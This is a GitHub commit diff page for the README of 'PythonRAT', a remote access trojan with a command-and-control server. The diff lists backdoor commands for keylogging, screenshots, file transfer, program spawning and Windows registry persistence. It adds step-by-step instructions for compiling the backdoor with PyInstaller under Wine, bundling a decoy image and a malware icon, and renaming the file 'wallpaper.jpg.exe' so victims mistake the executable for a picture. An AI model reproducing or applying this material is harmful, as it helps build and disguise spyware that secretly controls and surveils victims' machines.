Skip to content

Commit 0cee4fb

Browse files
authored
Update README.md
1 parent eabde88 commit 0cee4fb

File tree

1 file changed

+25
-6
lines changed

1 file changed

+25
-6
lines changed

README.md

Lines changed: 25 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -40,14 +40,17 @@ PythonRAT is a Command and Control (C2) server which can control multiple machin
4040
cd *Directory name* --> Changes Directory On Target System
4141
upload *file name* --> Upload File To The Target Machine From Working Dir
4242
download *file name* --> Download File From Target Machine
43-
get *url* --> Download File From Specified URL
43+
get *url* --> Download File From Specified URL to Target ./
4444
keylog_start --> Start The Keylogger
4545
keylog_dump --> Print Keystrokes That The Target From taskmanager.txt
4646
keylog_stop --> Stop And Self Destruct Keylogger File
47-
persistence *RegName* *filename* --> Create Persistence In Registry (Windows)
48-
check --> Check If Has Administrator Privileges (Windows)
4947
screenshot --> Takes screenshot and sends to server ./screenshots/
48+
start *programName* --> Spawn Program Using backdoor e.g. 'start notepad'
5049
remove_backdoor --> Removes backdoor from target!!!
50+
51+
===Windows Only===
52+
persistence *RegName* *filename* --> Create Persistence In Registry
53+
check --> Check If Has Administrator Privileges
5154

5255
# Wine and Pyinstaller (Win version) Installation on Linux
5356

@@ -91,19 +94,35 @@ or,
9194

9295
# wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py
9396

97+
**alternatively** if an _icon_ has already been created,
98+
99+
# wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py
100+
94101
This will produce _./dist/backdoor.exe_
95102

96103

97-
**Obfuscation using SFX archive**
104+
**Obfuscation using SFX Archive (Theory)**
98105

99106
The executable _backdoor.exe_ will be made to look like an image (jpg) file.
100107
By default Windows does not show file extensions (e.g. backdoor.exe will show in Windows Explorer as backdoor).
101108
Hence, we will create an SFX archive name _wallpaper.jpg.exe_ which Windows Explorer will show as _wallpaper.jpg_.
102109

103-
This will involve having image.jpg which we will also create an icon version of _.ico_ to assign the SFX archive.
110+
This will involve having an _image_ which we will also create an icon version of _.ico_ to assign the SFX archive.
104111
Making the executable appear to be an image.
105112

106-
**Creating SFX archive**
113+
Of course this same method could be applied to audio, document or video file using an appopriate icon.
114+
115+
**NOTE: SFX Archive**
116+
117+
SFX archive is not the only method of obfuscating the executable.
118+
We can when compiling using _Pyinstaller_ add the argument _--add-data "/root/wallpaper.jpg;."_ with
119+
_--icon ~/wallpaper.ico_.
120+
121+
# wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py
122+
# mv ./dist/_backdoor.exe_ ./dist/_wallpaper.jpg.exe_
123+
124+
125+
**Creating SFX Archive**
107126

108127
WinRAR > Add To Archive (image.jpg and backdoor.exe)
109128

0 commit comments

Comments
 (0)